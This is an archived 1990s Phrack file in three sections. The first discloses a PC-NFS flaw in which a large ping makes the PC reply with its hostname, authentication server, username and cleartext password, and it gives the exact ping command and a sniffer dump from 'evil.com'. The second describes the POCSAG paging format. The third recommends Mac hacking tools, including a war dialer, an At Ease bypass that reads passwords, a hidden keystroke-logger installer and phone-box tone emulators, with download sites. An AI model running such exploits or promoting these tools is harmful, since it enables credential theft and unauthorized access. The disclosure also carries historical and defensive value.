home *** CD-ROM | disk | FTP | other *** search
/ The Hacker's Encyclopedia 1998 / hackers_encyclopedia.iso / zines / phrack2 / p48_03.txt < prev    next >
Encoding:
Text File  |  2003-06-11  |  61.0 KB  |  1,165 lines

  1.                          ==Phrack Magazine==
  2.  
  3.               Volume Seven, Issue Forty-Eight, File 3 of 18
  4.  
  5.  
  6.                            //   //  /\   //   ====
  7.                           //   //  //\\ //   ====
  8.                          ==== //  //  \\/   ====
  9.  
  10.                      /\   //  // \\    //  /===   ====
  11.                     //\\ //  //   //  //   \=\   ====
  12.                    //  \\/    \\ //  //   ===/  ====
  13.  
  14.                                 Part I
  15.  
  16. ------------------------------------------------------------------------------
  17.  
  18. PC-NFS Bug
  19.  
  20.  
  21. I have found a nice little security hole in PC-NFS version 5.x.  If you 
  22. ping a PC-NFS user with a packet size of between 1450 to 1480, the 
  23. PC'Æs ICMP reply packet will divulge:
  24.  
  25.     o The hostname of the PC
  26.     o The hostname of the PC'Æs authentication server
  27.     o The username of the person logged in
  28.     o The password for the user (Thank you very much!)
  29.  
  30. All of this information is in clear text unless PC-NFSÆ's NETLOGIN is 
  31. used.  NETLOGIN uses XOR as its encryption, so this is hardly secure 
  32. either.
  33.  
  34. NDIS, ODI, 3C503 drivers on SMC and 3C503 cards have been tested 
  35. and all freely return the above information on both PC-NFS versions 
  36. 5.0 and 5.1a.  This should work with other driver/NIC configurations 
  37. also.
  38.  
  39. You get the occasional added bonus of locking up the victims PC as 
  40. well!
  41.  
  42. This bug was new to Sun and they have created a new PCNFS.SYS 
  43. driver for us.  They have labeled it PC-NFS.SYS version 5.1a.DOD.  
  44. This new version fills reply ICMP packets with nulls after 200 bytes of
  45. the requested pattern.
  46.  
  47. Until you receive this patch from Sun, I would recommend setting all 
  48. external router interface MTU to a value of no greater than 1350 as this 
  49. is point where secrets are contained in the return packet.
  50.  
  51. The Unix command to generate the below results is as follows:
  52.  
  53.     ping -s -c1 pchost.victim.com 1480
  54.  
  55. Use your favorite sniffer to filter ICMP packets and you have it.  If you 
  56. don'Æt have a sniffer, try the -v(erbose) option of ping and convert the 
  57. hex to ascii starting around byte 1382.
  58.  
  59. Sniffer output follows:
  60.  
  61. 19:03:48.81 
  62.         ip: evil.com->pchost.victim.com
  63.         icmp: echo request
  64.         62: 024 025 026 027 030 031 032 033 034 035
  65.         72: 036 037       !   "   #   $   %   &   '
  66.         82:   (   )   *   +   ,   -   .   /   0   1
  67.         92:   2   3   4   5   6   7   8   9   :   ;
  68.         102:   <   =   >   ?   @   A   B   C   D   E
  69.         112:   F   G   H   I   J   K   L   M   N   O
  70.         122:   P   Q   R   S   T   U   V   W   X   Y
  71.         132:   Z   [   \   ]   ^   _   `   a   b   c
  72.         142:   d   e   f   g   h   i   j   k   l   m
  73.         152:   n   o   p   q   r   s   t   u   v   w
  74.         162:   x   y   z   {   |   }   ~ 177 200 201
  75.         172: 202 203 204 205 206 207 210 211 212 213
  76.         182: 214 215 216 217 220 221 222 223 224 225
  77.         192: 226 227 230 231 232 233 234 235 236 237
  78.         202: 240 241 242 243 244 245 246 247 250 251
  79.         212: 252 253 254 255 256 257 260 261 262 263
  80.         222: 264 265 266 267 270 271 272 273 274 275
  81.         232: 276 277 300 301 302 303 304 305 306 307
  82.         242: 310 311 312 313 314 315 316 317 320 321
  83.         252: 322 323 324 325 326 327 330 331 332 333
  84.         262: 334 335 336 337 340 341 342 343 344 345
  85.         272: 346 347 350 351 352 353 354 355 356 357
  86.         282: 360 361 362 363 364 365 366 367 370 371
  87.         292: 372 373 374 375 376 377 000 001 002 003
  88.         302: 004 005 006 007 010 011 012 013 014 015
  89.         312: 016 017 020 021 022 023 024 025 026 027
  90.         322: 030 031 032 033 034 035 036 037       !
  91.         332:   "   #   $   %   &   '   (   )   *   +
  92.         342:   ,   -   .   /   0   1   2   3   4   5
  93.         352:   6   7   8   9   :   ;   <   =   >   ?
  94.         362:   @   A   B   C   D   E   F   G   H   I
  95.         372:   J   K   L   M   N   O   P   Q   R   S
  96.         382:   T   U   V   W   X   Y   Z   [   \   ]
  97.         392:   ^   _   `   a   b   c   d   e   f   g
  98.         402:   h   i   j   k   l   m   n   o   p   q
  99.         412:   r   s   t   u   v   w   x   y   z   {
  100.         422:   |   }   ~ 177 200 201 202 203 204 205
  101.         432: 206 207 210 211 212 213 214 215 216 217
  102.         442: 220 221 222 223 224 225 226 227 230 231
  103.         452: 232 233 234 235 236 237 240 241 242 243
  104.         462: 244 245 246 247 250 251 252 253 254 255
  105.         472: 256 257 260 261 262 263 264 265 266 267
  106.         482: 270 271 272 273 274 275 276 277 300 301
  107.         492: 302 303 304 305 306 307 310 311 312 313
  108.         502: 314 315 316 317 320 321 322 323 324 325
  109.         512: 326 327 330 331 332 333 334 335 336 337
  110.         522: 340 341 342 343 344 345 346 347 350 351
  111.         532: 352 353 354 355 356 357 360 361 362 363
  112.         542: 364 365 366 367 370 371 372 373 374 375
  113.         552: 376 377 000 001 002 003 004 005 006 007
  114.         562: 010 011 012 013 014 015 016 017 020 021
  115.         572: 022 023 024 025 026 027 030 031 032 033
  116.         582: 034 035 036 037       !   "   #   $   %
  117.         592:   &   '   (   )   *   +   ,   -   .   /
  118.         602:   0   1   2   3   4   5   6   7   8   9
  119.         612:   :   ;   <   =   >   ?   @   A   B   C
  120.         622:   D   E   F   G   H   I   J   K   L   M
  121.         632:   N   O   P   Q   R   S   T   U   V   W
  122.         642:   X   Y   Z   [   \   ]   ^   _   `   a
  123.         652:   b   c   d   e   f   g   h   i   j   k
  124.         662:   l   m   n   o   p   q   r   s   t   u
  125.         672:   v   w   x   y   z   {   |   }   ~ 177
  126.         682: 200 201 202 203 204 205 206 207 210 211
  127.         692: 212 213 214 215 216 217 220 221 222 223
  128.         702: 224 225 226 227 230 231 232 233 234 235
  129.         712: 236 237 240 241 242 243 244 245 246 247
  130.         722: 250 251 252 253 254 255 256 257 260 261
  131.         732: 262 263 264 265 266 267 270 271 272 273
  132.         742: 274 275 276 277 300 301 302 303 304 305
  133.         752: 306 307 310 311 312 313 314 315 316 317
  134.         762: 320 321 322 323 324 325 326 327 330 331
  135.         772: 332 333 334 335 336 337 340 341 342 343
  136.         782: 344 345 346 347 350 351 352 353 354 355
  137.         792: 356 357 360 361 362 363 364 365 366 367
  138.         802: 370 371 372 373 374 375 376 377 000 001
  139.         812: 002 003 004 005 006 007 010 011 012 013
  140.         822: 014 015 016 017 020 021 022 023 024 025
  141.         832: 026 027 030 031 032 033 034 035 036 037
  142.         842:       !   "   #   $   %   &   '   (   )
  143.         852:   *   +   ,   -   .   /   0   1   2   3
  144.         862:   4   5   6   7   8   9   :   ;   <   =
  145.         872:   >   ?   @   A   B   C   D   E   F   G
  146.         882:   H   I   J   K   L   M   N   O   P   Q
  147.         892:   R   S   T   U   V   W   X   Y   Z   [
  148.         902:   \   ]   ^   _   `   a   b   c   d   e
  149.         912:   f   g   h   i   j   k   l   m   n   o
  150.         922:   p   q   r   s   t   u   v   w   x   y
  151.         932:   z   {   |   }   ~ 177 200 201 202 203
  152.         942: 204 205 206 207 210 211 212 213 214 215
  153.         952: 216 217 220 221 222 223 224 225 226 227
  154.         962: 230 231 232 233 234 235 236 237 240 241
  155.         972: 242 243 244 245 246 247 250 251 252 253
  156.         982: 254 255 256 257 260 261 262 263 264 265
  157.         992: 266 267 270 271 272 273 274 275 276 277
  158.         1002: 300 301 302 303 304 305 306 307 310 311
  159.         1012: 312 313 314 315 316 317 320 321 322 323
  160.         1022: 324 325 326 327 330 331 332 333 334 335
  161.         1032: 336 337 340 341 342 343 344 345 346 347
  162.         1042: 350 351 352 353 354 355 356 357 360 361
  163.         1052: 362 363 364 365 366 367 370 371 372 373
  164.         1062: 374 375 376 377 000 001 002 003 004 005
  165.         1072: 006 007 010 011 012 013 014 015 016 017
  166.         1082: 020 021 022 023 024 025 026 027 030 031
  167.         1092: 032 033 034 035 036 037       !   "   #
  168.         1102:   $   %   &   '   (   )   *   +   ,   -
  169.         1112:   .   /   0   1   2   3   4   5   6   7
  170.         1122:   8   9   :   ;   <   =   >   ?   @   A
  171.         1132:   B   C   D   E   F   G   H   I   J   K
  172.         1142:   L   M   N   O   P   Q   R   S   T   U
  173.         1152:   V   W   X   Y   Z   [   \   ]   ^   _
  174.         1162:   `   a   b   c   d   e   f   g   h   i
  175.         1172:   j   k   l   m   n   o   p   q   r   s
  176.         1182:   t   u   v   w   x   y   z   {   |   }
  177.         1192:   ~ 177 200 201 202 203 204 205 206 207
  178.         1202: 210 211 212 213 214 215 216 217 220 221
  179.         1212: 222 223 224 225 226 227 230 231 232 233
  180.         1222: 234 235 236 237 240 241 242 243 244 245
  181.         1232: 246 247 250 251 252 253 254 255 256 257
  182.         1242: 260 261 262 263 264 265 266 267 270 271
  183.         1252: 272 273 274 275 276 277 300 301 302 303
  184.         1262: 304 305 306 307 310 311 312 313 314 315
  185.         1272: 316 317 320 321 322 323 324 325 326 327
  186.         1282: 330 331 332 333 334 335 336 337 340 341
  187.         1292: 342 343 344 345 346 347 350 351 352 353
  188.         1302: 354 355 356 357 360 361 362 363 364 365
  189.         1312: 366 367 370 371 372 373 374 375 376 377
  190.         1322: 000 001 002 003 004 005 006 007 010 011
  191.         1332: 012 013 014 015 016 017 020 021 022 023
  192.         1342: 024 025 026 027 030 031 032 033 034 035
  193.         1352: 036 037       !   "   #   $   %   &   '
  194.         1362:   (   )   *   +   ,   -   .   /   0   1
  195.         1372:   2   3   4   5   6   7   8   9   :   ;
  196.         1382:   <   =   >   ?   @   A   B   C   D   E
  197.         1392:   F   G   H   I   J   K   L   M   N   O
  198.         1402:   P   Q   R   S   T   U   V   W   X   Y
  199.         1412:   Z   [   \   ]   ^   _   `   a   b   c
  200.         1422:   d   e   f   g   h   i   j   k   l   m
  201.         1432:   n   o   p   q   r   s   t   u   v   w
  202.         1442:   x   y   z   {   |   }   ~ 177 200 201
  203.         1452: 202 203 204 205 206 207 210 211 212 213
  204.         1462: 214 215 216 217 220 221 222 223 224 225
  205.         1472: 226 227 230 231 232 233 234 235 236 237
  206.         1482: 240 241 242 243 244 245 246 247 250 251
  207.  
  208. 19:03:48.85 
  209.         ip: pchost.victim.com->evil
  210.         icmp: echo reply
  211.         62: 024 025 026 027 030 031 032 033 034 035
  212.         72: 036 037       !   "   #   $   %   &   '
  213.         82:   (   )   *   +   ,   -   .   /   0   1
  214.         92:   2   3   4   5   6   7   8   9   :   ;
  215.         102:   <   =   >   ?   @   A   B   C   D   E
  216.         112:   F   G   H   I   J   K   L   M   N   O
  217.         122:   P   Q   R   S   T   U   V   W   X   Y
  218.         132:   Z   [   \   ]   ^   _   `   a   b   c
  219.         142:   d   e   f   g   h   i   j   k   l   m
  220.         152:   n   o   p   q   r   s   t   u   v   w
  221.         162:   x   y   z   {   |   }   ~ 177 200 201
  222.         172: 202 203 204 205 206 207 210 211 212 213
  223.         182: 214 215 216 217 220 221 222 223 224 225
  224.         192: 226 227 230 231 232 233 234 235 236 237
  225.         202: 240 241 242 243 244 245 246 247 250 251
  226.         212: 252 253 254 255 256 257 260 261 262 263
  227.         222: 264 265 266 267 270 271 272 273 274 275
  228.         232: 276 277 300 301 302 303 304 305 306 307
  229.         242: 310 311 312 313 314 315 316 317 320 321
  230.         252: 322 323 324 325 000 000 324 005   ^   $
  231.         262:   : 004 000 000 000 000 000 000 000 000
  232.         272: 036 006   W   V   P   S   Q   R 016 007
  233.         282: 277   ^   $ 213 367 350   X   p   r   c
  234.         292: 212   E   "   < 000   u 005 350   V 003
  235.         302: 353   W   < 005   u 005 350   W 002 353
  236.         312:   N   < 010   u 007 306 006 325   # 001
  237.         322: 353   H   < 015   u 007 306 006 325   #
  238.         332: 001 353   =   < 017   u 007 306 006 325
  239.         342:   # 001 353   2   < 022   u 005 350 021
  240.         352: 002 353   $   < 003   u 005 350   9 003
  241.         362: 353 033   < 022   w 017   2 344 213 360
  242.         372: 212 204 300   #   P 350 225 305   X 353
  243.         382: 010   P 270   c 000 350 213 305   X 306
  244.         392: 006 205 347 000   Z   Y   [   X   ^   _
  245.         402: 007 037 313   P   S   Q   R   U 036 006
  246.         412:   W   V 214 310 216 330 216 300 306 006
  247.         422: 325   # 000 373 277   ^   $ 273   A 347
  248.         432: 271 006 000 215   6   d   $ 212 004 210
  249.         442: 005 212 007 210 004   F   G   C 342 363
  250.         452: 241   x   $ 243   |   $ 241   z   $ 243
  251.         462:   ~   $ 241 324   ) 243   x   $ 241 326
  252.         472:   ) 243   z   $ 277   ^   $ 212   E   "
  253.         482:   < 010   u 015   P 270   ` 000 350   $
  254.         492: 305   X 350 275 001 353 022   < 015   u
  255.         502: 012   P 270   a 000 350 023 305   X 353
  256.         512: 004   < 017   u 003 350 017 000 306 006
  257.         522: 205 347 000   ^   _ 007 037   ]   Z   Y
  258.         532:   [   X 303   P 270   < 000 350 363 304
  259.         542:   X 307   E   $ 000 000 215   u   " 213
  260.         552:   M 020 206 351 203 351 024 367 301 001
  261.         562: 000   t 006 213 331 306 000 000   A 321
  262.         572: 371 350   ,   o 211   ]   $ 307   E 030
  263.         582: 000 000 215   u 016 271 012 000 350 033
  264.         592:   o 211   ] 030 213   E 020 206 340 005
  265.         602: 016 000 243   `   % 211   >   b   % 214
  266.         612: 016   d   % 277   ^   %   . 376 006   ?
  267.         622: 020 350   9 276   . 376 016   ? 020 303
  268.         632:   & 213   E 002 013 300   t 020 243 326
  269.         642:   #   & 213   ] 004 211 036 330   # 350
  270.         652: 231   m 353   0 200   > 324   ) 000   t
  271.         662: 033   & 203   } 006 000   t 024 203   >
  272.         672: 326   # 000   u 015 350 031 000 203   >
  273.         682: 326   # 000   t 003 350   u   m 241 326
  274.         692:   #   & 211   E 002 241 330   #   & 211
  275.         702:   E 004 303   & 213   M 006 006   V   W
  276.         712: 016 007 272 000 000 277 334   # 350   $
  277.         722: 000 241 323   # 243 350   X 203   > 326
  278.         732:   # 000   u 023 366 006 343 015 001   u
  279.         742: 014 203   > 350   X 000   u 353 272 001
  280.         752: 000 342 332   _   ^ 007 303   Q   R   W
  281.         762: 203 372 000   u 021 203   > 030 214 000
  282.         772:   t 012 276 004 214 271 003 000 363 245
  283.         782: 353 010 270 377 377 271 003 000 363 253
  284.         792: 276   A 347 271 003 000 363 245   _ 270
  285.         802: 377 377 211   E 036 211   E     241 324
  286.         812:   ) 211   E 032 241 326   ) 211   E 034
  287.         822: 270     000 206 340 211   E 020 306   E
  288.         832: 016   E 306   E 017 000 307   E 022 000
  289.         842: 000 307   E 024 000 000 306   E 026 002
  290.         852: 306   E 027 001 307   E 014 010 000   3
  291.         862: 300 306   E   " 021 210   E   # 211   E
  292.         872:   & 211   E   ( 350 250 376   Z   Y 303
  293.         882: 200   > 326   # 000   u 014 213   E   *
  294.         892: 243 326   # 213   E   , 243 330   #   P
  295.         902: 270   V 000 350 205 303   X 303   P   S
  296.         912:   Q   R 213   E   : 213   ]   < 213   M
  297.         922:   & 213   U   ( 350 223   k   Z   Y   [
  298.         932:   X   P 270   \ 000 350   e 303   X 303
  299.         942: 306   E   " 000   P 270   X 000 350   X
  300.         952: 303   X 303   & 213   E 002   & 213   ]
  301.         962: 004   & 213   U 006 006   W 016 007 350
  302.         972:   Y   i   s 003 351 227 000 277 334   #
  303.         982:   W 271 003 000 363 245 276   A 347 271
  304.         992: 003 000 363 245   _ 211   E 036 211   ]
  305.         1002:     241 324   ) 211   E 032 241 326   )
  306.         1012: 211   E 034 270     000 206 340 211   E
  307.         1022: 020 306   E 016   E 306   E 017 000 307
  308.         1032:   E 022 000 000 307   E 024 000 000 306
  309.         1042:   E 026 377 306   E 027 001 307   E 014
  310.         1052: 010 000   3 300 306   E   " 010 210   E
  311.         1062:   # 211   E   & 377 006   h   % 241   h
  312.         1072:   % 211   E   ( 211 026 350   X 211 026
  313.         1082:   l   % 307 006   j   % 000 000 350 322
  314.         1092: 375 203   > 350   X 000   t   # 366 006
  315.         1102: 343 015 001   u   ! 203   >   j   % 000
  316.         1112:   t 353 203   >   j   % 001   u 011 241
  317.         1122:   l   %   + 006 350   X 353 015 270 375
  318.         1132: 377 353 010 270 376 377 353 003 270 377
  319.         1142: 377 307 006   l   % 000 000   _ 007   &
  320.         1152: 211   E 010 303   P 270   ^ 000 350 206
  321.         1162: 302   X 203   >   l   % 000   t 017 213
  322.         1172:   ]   (   ; 036   h   %   u 006 307 006
  323.         1182:   j   % 001 000 303   P 270   ; 000 350
  324.         1192:   g 302   X 203   >   l   % 000   t 006
  325.         1202: 307 006   j   % 002 000 303 000 000 000
  326.         1212: 000 000 000 000 000 000 000 000 000 000
  327.         1222: 000 000 000 000 000 000 000 000 000 000
  328.         1232: 000 000 000 000 000 000 000 000 000 000
  329.         1242: 000 000 000 000 000 000 000 000 002 000
  330.         1252: 000 000 300   A 000 000 034 000 000 000
  331.         1262: 200 000 000 000   k 000 000 000 000 016
  332.         1272: 000 000 000     000 000 000 000 000 000
  333.         1282: 010 000 000 000 252 001 000 000 010   5
  334.         1292: 000 000   r 027 301   . 000 000 000 000
  335.         1302: 036   F 300   . 000 000 000 000 036   F
  336.         1312: 300   . 000 000 000 000 000 000 000 000
  337.         1322: 000 000 000 000 000 000 000 000 000 000
  338.         1332: 000 000 000 000 000 000 000 000 000 000
  339.         1342: 000 000 000 000 000 000 000 000 000    
  340.         1352: 000 000 000 002 000 000 200 366   = 000
  341.         1362:   { 255 023 000 242 265 015 000 002 000
  342.         1372: 000 000   S 017 005 000   C 003 000 000
  343.         1382:   p   c   h   o   s   t 000 000 000 000
  344.         1392: 000 000 000 000 000 000 244   A   @   -
  345.         1402:   s   e   r   v   e   r   1 000 000 000
  346.         1412: 000 000 000 000 000 000 244   A   @ 001
  347.         1422: 000 000 000 000 000 000 000 000 000 000
  348.         1432: 000 000 000 000 000 000 244   A   @ 001
  349.         1442:   u   s   e   r   n   a   m   e 000 000
  350.         1452:   p   a   s   s   w   d 000 000 000 000
  351.         1462: 000 000 000 000 000 000 000 000 000 000
  352.         1472: 000 000 000 000 000 000 000 000 000 000
  353.         1482: 000 000 200 000   k 000 260 271 377 377
  354.         1492: 344 275   9 212
  355.  
  356. The names have been changed to protect the innocent, but the rest is actual.
  357.  
  358. Byte 1382:  PC's hostname
  359. Byte 1402:  PC's Authentication server hostname
  360. Byte 1382:  The user's account name.  Shows nobody if logged out.
  361. Byte 1382:  The user's password.
  362.  
  363. ------------------------------------------------------------------------------
  364.  
  365.         POCSAG paging format, code and code capacity
  366.  
  367. The POCSAG (Post Office Code Standardization Advisory Group) code is a
  368. synchronous paging format that allows pages to be transmitted in a SINGLE-BATCH
  369. structure. The POCSAG codes provides improved battery-saving capability and an
  370. increased code capacity.
  371. The POCSAG code format consists of a preamble and one or more batches of
  372. codewords. Each batch comprises a 32-bit frame synchronization code and eight
  373. 64-bit address frames of two 32-bit addresses or idle codewords each. The
  374. frame synchronization code marks the start of the batch of codewords.
  375.  
  376. -PREAMBLE STRUCTURE
  377. The preamble consists of 576 bits of an alternating 101010 pattern transmitted
  378. at a bit rate of 512 or 1200 bps. The decoder uses the preamble both to
  379. determine if the data received is a POCSAG signal and for synchronization with
  380. the stream of data.
  381.  
  382.        |---Preamble----|-----------First Batch-------------|--Subsec. Batch--|
  383.  
  384.         ______________________________________________________< <____________
  385. paging |  576 bits of  | |   |   |   |   |   |   |   |   | |   > >           |
  386. format |   reversals   |F| | | | | | | | | | | | | | | | |F|                 |
  387.        | (101010, etc) |S| | | | | | | | | | | | | | | | |S|                 |
  388.        |_______________|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|__< <____________|
  389.                                    > >
  390. 1 FRAME = 2 CODEWORDS
  391.  
  392.         Preamble    Batchs
  393.  
  394.  512 BPS    1125 mS        1062.5 mS
  395.  
  396. 1200 BPS     480 mS         453.3 mS
  397.  
  398. CodeWords Structure
  399.         ____________________________________________________________________
  400. BIT    |   |              |       |                       |                 |
  401. NUMBER | 1 |   2 to 19    | 20,21 |       22 to 31        |        32       |
  402.        |___|______________|_______|_______________________|_________________|
  403.         ____________________________________________________________________
  404. ADDRESS|   |              |       |                       |                 | 
  405. FORMAT | 0 | Address Bits | S I B |   Parity Check Bits   |   Even parity   |
  406.        |___|______________|_______|_______________________|_________________|
  407.                               ^ 
  408.                               Source identifier bits 
  409.     ____________________________________________________________________
  410. MESSAGE|   |                      |                       |                 |
  411. FORMAT | 1 |     Message Bits     |   Parity Check Bits   |   Even parity   |
  412.        |___|______________________|_______________________|_________________|
  413.  
  414. -BATCH STRUCTURE
  415. A batch consist of frame synchronization code follow by 8 frames of two address
  416. codewords per frame (16 address codewords per batch). In order to maintain the
  417. proper batch structure, each frame is filled with two address codewords, or two
  418. idle codewords, or two message codewords, or any appropriate combination of the
  419. three codewords types.
  420.  
  421. -FRAME SYNCHRONIZATION CODE STRUCTURE
  422. The frame synchronization (FS) code is a unique, reserved word that is used to
  423. identify the beginning of each batch. The FS code comprises the 32 bits:
  424.  
  425.     011111100110100100001010111011000.
  426.  
  427. -OPTIONAL ALTERNATE FRAME SYNCHRONIZATION CODEWORDS
  428. An alternate frame synchronization (AFS) code can be selected to support special
  429. systems or systems that require increased coding capability. The AFS is
  430. generated in the same manner as an address codeword (i.e., BCH codeword with
  431. parity bits). The POCSAG signaling standard has reserved special codewords for
  432. the AFS from 2,000,000 to 2,097,151. The use of the AFS requires the paging
  433. system to support the AFS. The AFS will change to frame 0 on the programmer
  434. since no frame information is included in the AFS. The AFS should use address
  435. 1 so that bit 20 and 21 are 0.
  436.  
  437. -ADDRESS CODEWORD STRUCTURE
  438. An address codeword's first bit (bit 1) is always a zero. Bits 2 through 19 are
  439. the address bits. The pagers looks at these bits to find its own unique
  440. address. Each POCSAG codeword is capable of providing address information for
  441. four different paging sources (Address 1 to 4). These address are determined
  442. by combinations of values of bits 20 and 21 ( the source-identifier bits). Bits
  443. 22 through 31 are the parity check bits, and bit 32 is the even parity bit.
  444.  
  445.  
  446.         BIT 20        BIT 21
  447. Address 1         0          0
  448. Address 2         0           1
  449. Address 3         1           0
  450. Address 4         1           1
  451.  
  452. Pre-coded into the code plug are three bits which designate the frame location,
  453. within each batch, at which the pager's address is to be received; the decoder
  454. will look at the codewords in this frame for its address.
  455. Power is removed from the receiver during all frames other than the precoded
  456. one, thus extending pager battery life.
  457.  
  458. -CODE CAPACITY 
  459. The combination of the code plug's three pre-coded frame location bits and address codeword's 18 address bits provides over two million different assignable codes. In this combination, the frame location bits are the least-significant bits, and the addres
  460. bits are the most-significant bits.
  461.  
  462. -MESSAGE CODEWORD STRUCTURE
  463. A message codeword structure always start with a 1 in bit 1 and always follows
  464. directly after the address. Each message codeword replaces an address codeword
  465. in the batch.
  466.  
  467. -IDLE CODEWORD STRUCTURE
  468. The idle codeword is unique, reserved codeword used to talk place of an address
  469. in any frame that would not otherwise be filled with 64 bits.
  470. Thus, if a frame contains only an address, an idle codeword comprises the 32
  471. bits:
  472.  
  473. 01111010100010011100000110010111
  474.  
  475. -POCSAG CHARACTERS
  476.  
  477. CHAR    HEX    |    CHAR    HEX    |    CHAR    HEX    |
  478.         |            |            |
  479. #    23    |    $    24    |    @    40    |
  480. [    5B    |    \    5C    |    ]    5D    |
  481. ^    5E    |    _    5F    |    '    60    |
  482. {    7B    |    |    7C    |    }    7D    |
  483. ~     7E    |    DEL    7F    |    SP    20    |
  484.  
  485. ------------------------------------------------------------------------------
  486.  
  487. MACINTOSH HACKING
  488. by Logik Bomb
  489.  
  490. "My fellow astronauts..."
  491. -Dan Quayle
  492.  
  493.         Now, two people have mailed Erik Bloodaxe asking about Macintosh
  494. hacking particularly war dialers, and each time he insulted Macs and tried
  495. to get someone to write a file on it. No one has done it. So I guess I have
  496. to.
  497.         First, some words on Macintoshes. Steve Jobs and Steve Wozniak, the
  498. originators of the Apple and the Macintosh were busted for phreaking in
  499. college. The Apple IIe was used almost universally by hackers. So why has
  500. the Mac fallen out of favor for hacking? Simple. Because it fell out of
  501. favor for everything else. Apple screwed up and wouldn't let clone makers
  502. license the MacOS. As a result, 80% of personal computers run DOS, and
  503. Macintoshes are left in the minority. Second, DOS compatible users, and
  504. hackers in particular, have an image of Mac users as a bunch of whiny
  505. lamers who paid too much for a computer and as a result are constantly
  506. defensive. The solution to this impression is to not be an asshole. I know
  507. it drives every Mac user crazy when he reads some article about Windows
  508. 95's brand new, advanced features such as "plug-and-play" that the
  509. Macintosh has had since 1984. But just try and take it. If it's any
  510. consolation, a lot of IBM-compatible (a huge misnomer, by the way) users
  511. hate Windows too.
  512. Now, on with the software.
  513. -------------------------
  514. Assault Dialer 1.5
  515.         Assault Dialer, by Crush Commando, is the premier Mac war dialer,
  516. the Mac's answer to ToneLoc. It has an ugly interface, but it's the best we
  517. have right now.  It is the successor to a previous war dialer known as Holy
  518. War Dialer 2.0. The only real competitor I've heard of for Assault Dialer
  519. is Tyrxis Shockwave 2.0, but the only version I could get a hold of was
  520. 1.0, and it wasn't as good as Assault Dialer, so that's your best bet right
  521. now.
  522.  
  523. MacPGP 2.6.2 and PGPfone 1.0b4
  524.         MacPGP is the Macintosh port of the infamous PGP (Pretty Good
  525. Privacy.) This file is not about cryptography, so if you want to know about
  526. PGP read the fuckin' read me and docs that come with the file. Strangely
  527. enough, however, Phil Zimmerman released PGPfone, a utility for encrypting
  528. your phone and making it a secure line, for the Mac _first._ I don't know
  529. why, and I haven't had a chance to test it, but the idea's pretty cool. If
  530. PGP doesn't get Zimmerman thrown in jail, this will.
  531.  
  532. DisEase 1.0 and DisEase 3.0
  533.         Schools and concerned parents have always had a problem. Schools
  534. can't have students deleting the hard drive, and parents don't want their
  535. kids looking at the kinky pictures they downloaded. So Apple came out with
  536. At Ease, an operating system that runs over System 7, sort of the same way
  537. Windows runs off of DOS. However, I can't stand At Ease. Everything about
  538. it, from the Fisher-Price screen to the interface drives me crazy. It
  539. drives a lot of other people crazy too. So it was just a matter of time
  540. before someone made a program to override it. The first was DisEase 1.0, a
  541. small program by someone calling himself Omletman, that would override At
  542. Ease if you put in a floppy loaded with it and clicked six times. Omletman
  543. improved this design and eventually released 3.0. (I haven't been able to
  544. find any evidence that a 2.0 was ever released) 3.0 has such cool features
  545. as reading the preferences file to give you the password, so you can change
  546. the obnoxious greeting teachers always put to something more sinister. The
  547. only problem with 3.0 is that some configurations of At Ease only let
  548. documents be read off of disks; no applications, which means DisEase 3.0
  549. won't appear, and so you can't run it. However, with 1.0 you don't have to
  550. actually open the application, you just click six times, so if you use 1.0
  551. to get to the finder, and then 3.0 to read the passwords, things will work.
  552.  
  553. Invisible Oasis Installer
  554.         Oasis is a keystroke recorder, so you can find out passwords.
  555. However, with the original Oasis, you had to put it in the Extensions
  556. folder and make it invisible with ResEdit, which takes a while. Invisible
  557. Oasis Installer, however, installs it where it should be and automatically
  558. makes it invisible.
  559. "So everything's wrapped up in a nice neat little _package_, then?"
  560. -Homer Simpson
  561.  
  562. Anonymity 2.0 and Repersonalize 1.0
  563.         Anonymity, version 1.2, was a rather old program whose author has
  564. long been forgotten that was the best data fork alterer available. It
  565. removed the personalization to programs. However, in around 1990 someone
  566. named the Doctor made 2.0, a version with some improvements. Repersonalize
  567. was made in 1988 (God, Mac hacking programs are old) which reset
  568. personalization on some of the Microsoft and Claris programs, so you could
  569. enter a different personalization name. I don't know if it will still work
  570. on Microsoft Word 6.0.1 and versions of programs released recently, but I
  571. don't really care because I use Word 5.1a and I'm probably not going to
  572. upgrade for a while.
  573.  
  574. Phoney (AKA Phoney4Mac)
  575.         Phoney is an excellent program that emulates the Blue Box, Red Box,
  576. Black Box and Green Box tones. There is also Phoney4Newton, which does the
  577. same thing on the most portable of computers, the Newton.
  578.  
  579.         That's all I'm covering in this file as far as Mac hacking
  580. programs. You'll probably want to know where to find all this crap, so here
  581. are all of the Mac hacking ftp and Web sites I know of:
  582. Space Rogue's Whacked Mac Archives (http://l0pht.com/~spacerog/index.html)
  583.         This site, run by Space Rogue is L0pht Heavy Industries' Mac site.
  584. It is probably the largest and best archive of Mac hacking software
  585. connected to the Internet. The problem with this is that it can't handle
  586. more than two anonymous users, meaning that unless you pay to be part of
  587. L0pht, you will never get into this archive. I've tried getting up at 4:30
  588. AM, thinking that no one in their right mind would possibly be awake at
  589. this time, but there is always, somehow, somewhere, two people in Iceland
  590. or Singapore or somewhere on this site.
  591. The Mac Hacking Home Page (http://www.aloha.com/~seanw/index.html)
  592.         This site does not look like much, and it is fairly obvious that
  593. its maintainer, Sean Warren, is still learning HTML, but it is reliable and
  594. is a good archive. It is still growing, probably due to the fact that it is
  595. one of the only Internet Mac hacking sites anyone can get to and upload.
  596. Kn0wledge Phreak <k0p> (http://www.uccs.edu/~abusby/k0p.html)
  597.         This is an excellent site and has many good programs. There is one
  598. catch, however. It's maintainer, Ole Buzzard, is actually getting the files
  599. from his BBS. So many of the really good files are locked away in the k0p
  600. BBS, and those of us who can't pay long distance can't get the files. Oh
  601. well.
  602. Bone's H/P/C Page o' rama- part of the Cyber Rights Now! home page
  603. (http://www.lib.iup.edu/~seaman/index.html)
  604.         While this is hardly a Macintosh hacking site, it's just a hacking
  605. site, it does have very few Mac files, some of which are hard to get to.
  606. However, Bone might get expelled because of a long story involving AOHell,
  607. so this page might not be here. Then again, maybe Bone won't get expelled
  608. and this site will stay. Never can tell 'bout the future, can you?
  609. "We predict the future. We invent it."
  610.         -Nasty government guy on the season premiere of _The X-Files_
  611.  
  612. Andy Ryder
  613. Netsurfer and Road Warrior on the Info Highway
  614. I've pestered Bruce Sterling _and_ R.U. Sirius!
  615. As mentioned in the alt.devilbunnies FAQ, part I (Look it up!)
  616. Once scored 29,013,920 points on Missile Command
  617.  
